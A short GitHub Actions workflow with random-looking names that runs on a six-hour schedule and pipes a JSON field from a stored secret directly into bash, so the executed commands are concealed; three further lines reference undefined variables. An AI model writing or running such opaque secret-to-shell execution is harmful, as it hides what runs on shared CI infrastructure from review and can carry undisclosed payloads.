name: lujingxi3456
on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          q7: ${{ secrets.q7 }}
        run: |
          echo $q7 | jq -r .rgh6639 | /bin/bash
          echo $oqpdr40441 | jq -r .jld19 | /bin/bash
          echo $jnuk207 | jq -r .am876 | /bin/bash
          echo $aw1 | jq -r .a2453 | /bin/bash

